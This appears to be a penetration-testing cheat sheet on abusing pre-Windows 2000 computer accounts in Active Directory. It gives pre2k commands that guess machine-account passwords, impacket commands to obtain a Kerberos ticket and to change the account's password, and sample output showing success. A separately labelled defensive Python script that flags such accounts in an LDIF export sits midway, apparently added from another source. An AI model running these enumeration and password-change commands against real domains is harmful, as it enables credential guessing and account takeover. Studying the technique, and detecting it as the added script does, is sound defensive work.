Pre-Windows 2000 Computer



Enum

Installation

python3 -m venv venv
source venv/bin/activate
git clone https://github.com/garrettfoster13/pre2k.git
cd pre2k/
pip3 install .

Query

# Unauth
pre2k unauth -d '<DOMAIN>' -dc-ip '<DC_IP>' -verbose -inputfile '<MACHINES_FILE>'
Sample Output:
$ cat machines.txt
banking$
$ pre2k unauth -d example.com -dc-ip 192.168.1.10 -verbose -inputfile 'machines.txt'
[pre2k ASCII banner: v3.1, @unsigned_sh0rt @Tw1sm]
[23:53:03] INFO Testing started at 2025-07-10 23:53:03
[23:53:03] INFO Using 10 threads
[23:53:03] INFO VALID CREDENTIALS: example.com\banking$:banking

# Auth
pre2k auth -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -dc-ip '<DC_IP>' -verbose
Sample Output:
$ pre2k auth -u trainee -p trainee -d example.com -dc-ip 192.168.1.10 -verbose
[pre2k ASCII banner: v3.1, @unsigned_sh0rt @Tw1sm]
[23:54:06] INFO Retrieved 2 results total.
[23:54:06] INFO Testing started at 2025-07-10 23:54:06
[23:54:06] INFO Using 10 threads
[23:54:07] INFO VALID CREDENTIALS: example.com\BANKING$:banking
[23:54:07] DEBUG Invalid credentials: example.com\DC$:dc

Ref: pre2k
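
A defender-side check for the accounts enumerated above, as an added example (not from this page or the pre2k project): it scans an LDIF export of computer objects for machine accounts that have never logged on and still carry PASSWD_NOTREQD. It assumes accounts pre-created with the "pre-Windows 2000" option appear as userAccountControl 4128 with logonCount 0; the LDIF sample, the OLDKIOSK$ account and the function names are constructed for illustration.

```python
# Added example: flag likely pre-created machine accounts in an LDIF export (constructed data).
import re

# userAccountControl bits (documented Active Directory flag values)
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000

SAMPLE_LDIF = """\
dn: CN=BANKING,CN=Computers,DC=example,DC=com
sAMAccountName: BANKING$
userAccountControl: 4128
logonCount: 0

dn: CN=DC,OU=Domain Controllers,DC=example,DC=com
sAMAccountName: DC$
userAccountControl: 532480
logonCount: 214

dn: CN=OLDKIOSK,CN=Computers,DC=example,DC=com
sAMAccountName: OLDKIOSK$
userAccountControl: 4130
logonCount: 0
"""

def parse_ldif(text):
    """Yield one dict per LDIF entry (simple 'attr: value' lines only)."""
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                entry[key.lower()] = value.strip()
        if entry:
            yield entry

def find_precreated(text):
    """Return (account, enabled) for never-used machine accounts with PASSWD_NOTREQD."""
    wanted = PASSWD_NOTREQD | WORKSTATION_TRUST_ACCOUNT  # 4128, assumed marker
    hits = []
    for e in parse_ldif(text):
        uac = int(e.get("useraccountcontrol", 0))
        if uac & wanted == wanted and int(e.get("logoncount", 0)) == 0:
            hits.append((e["samaccountname"], not uac & ACCOUNTDISABLE))
    return hits

if __name__ == "__main__":
    for name, enabled in find_precreated(SAMPLE_LDIF):
        print(f"{name}\tenabled={enabled}\treset the password or delete if unused")
```

Enabled hits are the priority; a disabled hit such as OLDKIOSK$ is still worth cleaning up before someone re-enables it.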

Abuse #1: Connect via Kerberos

1. Request a Ticket

sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
$ sudo ntpdate -s dc.example.com && impacket-getTGT 'example.com/Banking$:banking' -dc-ip dc.example.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Banking$.ccache
export KRB5CCNAME='<USER>.ccache'

Abuse #2: Change Target Password

impacket-changepasswd -newpass <NEW_PASSWORD> '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -protocol rpc-samr
Sample Output:
$ impacket-changepasswd -newpass banking 'example.com/BANKING$:banking@dc.example.com' -protocol rpc-samr
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\BANKING$
[*] Connecting to DCE/RPC as example.com\BANKING$
[*] Password was changed successfully.